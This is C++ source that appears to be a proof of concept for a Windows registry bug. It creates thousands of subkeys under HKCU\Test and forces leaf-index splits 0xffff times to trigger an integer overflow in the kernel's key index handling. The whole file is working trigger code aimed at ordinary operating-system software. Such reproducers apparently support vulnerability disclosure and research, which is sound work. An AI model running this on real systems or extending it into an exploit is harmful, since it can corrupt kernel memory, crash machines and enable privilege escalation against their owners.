#include <Windows.h>
#include <winternl.h>

#include <cstdio>
#include <deque>

#pragma comment(lib, "ntdll")

extern "C" {

NTSTATUS NTAPI NtDeleteKey(
  HANDLE KeyHandle
);

}  // extern "C"

static LONG CreateSubKeyWithIndex(HKEY hkey, ULONG dwKeyIndex, PHKEY phkey) {
  CHAR chKeyName[10];
  _snprintf_s(chKeyName, sizeof(chKeyName), "%.8x", dwKeyIndex);

  return RegCreateKeyExA(hkey, chKeyName, 0, NULL, 0, KEY_ALL_ACCESS, NULL, phkey, NULL);
}

int main(int argc, char** argv) {
  LONG st;
  HKEY hkey, hnewkey;

  do {
    st = RegCreateKeyExA(HKEY_CURRENT_USER, "Test", 0, NULL, 0, KEY_ALL_ACCESS, NULL, &hkey, NULL);
    if (st != ERROR_SUCCESS) {
      break;
    }

    std::deque<HKEY> current_leaf;
    ULONG dwKeyIndex = 0;

    // Create the first 508 subkeys to create a half-full first leaf index.
    for (ULONG i = 0; i < 508; i++) {
      HKEY hnewkey;
      st = CreateSubKeyWithIndex(hkey, dwKeyIndex, &hnewkey);
      if (st != ERROR_SUCCESS) {
        goto error;
      }
      dwKeyIndex++;

      current_leaf.push_back(hnewkey);
    }

    // Trigger the leaf splitting 0xffff times to hit the integer overflow.
    for (ULONG i = 0; i < 0xffff; i++) {
      // Add 506 more subkeys to the last leaf to reach 1014 and split it.
      for (ULONG j = 0; j < 506; j++) {
        st = CreateSubKeyWithIndex(hkey, dwKeyIndex, &hnewkey);
        if (st != ERROR_SUCCESS) {
          goto error;
        }
        dwKeyIndex++;

        current_leaf.push_back(hnewkey);
      }

      // Just leave the first subkey in the now second-to-last leaf as is;
      // close the handle.
      RegCloseKey(current_leaf.front());
      current_leaf.pop_front();

      // Delete the other 505 subkeys to free up space.
      for (ULONG j = 0; j < 505; j++) {
        NtDeleteKey(current_leaf.front());
        RegCloseKey(current_leaf.front());
        current_leaf.pop_front();
      }

      printf("Leaf splitting iteration %u\n", i);
    }

    RegCloseKey(hkey);
  } while (0);

error:
  if (st != ERROR_SUCCESS) {
    printf("Call failed with error %d\n", st);
  }

  return 0;
}


